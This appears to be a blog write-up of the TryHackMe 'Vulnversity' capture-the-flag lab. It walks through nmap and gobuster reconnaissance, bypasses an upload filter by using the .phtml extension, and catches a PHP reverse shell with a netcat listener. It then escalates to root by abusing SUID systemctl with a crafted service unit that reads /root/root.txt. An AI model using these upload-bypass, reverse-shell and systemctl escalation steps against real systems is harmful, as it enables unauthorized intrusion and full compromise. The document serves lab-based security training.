TryHackMe — Vulnversity

Learn about active recon, web app attacks and privilege escalation.

Image for post
Image for post

Machine Information:

Image for post
Image for post

NMAP Cheat Sheet:

Image for post
Image for post

Reconnaissance

  1. Scan the box, how many ports are open?

sudo nmap -PS 10.10.213.40

-PS==TCP SYN/ACK, UDP or SCTP discovery to given ports.

Image for post
Image for post

2. What version of the squid proxy is running on the machine?

Note — squid proxy runs on port 3128 as shown on Port discovery scan.

sudo nmap -sV -p 3128 10.10.213.40

-sV ==Probe open ports to determine service/version info.

-p 312==Specifies scan on TCP port 3128.

3. How many ports will nmap scan if the flag -p-400 was used?

sudo nmap -p-400 10.10.213.40

-p-400 ==will scan top 400 ports

4. Using the nmap flag -n what will it not resolve?

nmap -h

Image for post
Image for post

5. What is the most likely operating system this machine is running?

sudo nmap -O -sV 10.10.213.40

-O == OS Scan

-sV ==Version scan

Image for post
Image for post

6. What port is the web server running on?

Image for post
Image for post

Locating directories using GoBuster

Image for post
Image for post

7. What is the directory that has an upload form page?

gobuster dir -u http://10.10.213.40:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 2>/dev/null

Image for post
Image for post
Image for post
Image for post

Compromise the webserver

Image for post
Image for post

8. Run this attack, what extension is allowed?

Image for post
Image for post
Uploading .php file is not allowed.

Test other extension files to determine what is allowed.

Image for post
Image for post

Values to test according to the Hints.

Image for post
Image for post

Only the .phtml extension does not contain the “Extension not allowed” error message.

Image for post
Image for post

Exploitation

Image for post
Image for post

Edit exploit and make it executable:

nano php-reverse-shell.phtml
chmod +x php-reverse-shell.phtml

Image for post
Image for post

Upload exploit to the target machine:

Image for post
Image for post
Image for post
Image for post

Setup a netcat listener on the attacker machine and execute exploit on the target machine:

nc -lvnp 4444

http://10.10.213.40:3333/internal/uploads/php-reverse-shell.phtml

Image for post
Image for post

And we got shell…

Image for post
Image for post

8. What is the name of the user who manages the webserver?

9. What is the user flag?

Image for post
Image for post

Privilege Escalation

Image for post
Image for post

10. On the system, search for all SUID files. What file stands out?

find / -perm -4000 2>/dev/null

Image for post
Image for post

Escalate privilege:

11.Become root and get the last flag (/root/root.txt)

nc -lvnp 4444 == setup a netcat listener on the attacker machine

First we create a variable which holds a unique file.

eop=$(mktemp).service

Then we create an unit file and write it into the variable.

echo ‘[Service]
ExecStart=/bin/sh -c “cat /root/root.txt > /tmp/output”
[Install]
WantedBy=multi-user.target’ > $eop

Inside the unit file we entered a command which will let shell execute the command cat and redirect the output of cat to a file called output in the folder tmp. And finally we use the /bin/systemctl program to enable the unit file.

/bin/systemctl link $eop

Created symlink from /etc/systemd/system/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service.

/bin/systemctl enable — now $eop

Created symlink from /etc/systemd/system/multi user.target.wants/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service.

Let’s see if it worked….

ls -lah /tmp

cat /tmp/output

Image for post
Image for post

References:

https://tryhackme.com/room/vulnversity

https://n0w4n.nl/vulnversity/

Written by

Experienced Network Security Engineer with a demonstrated history of working in the field of IT security industry.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store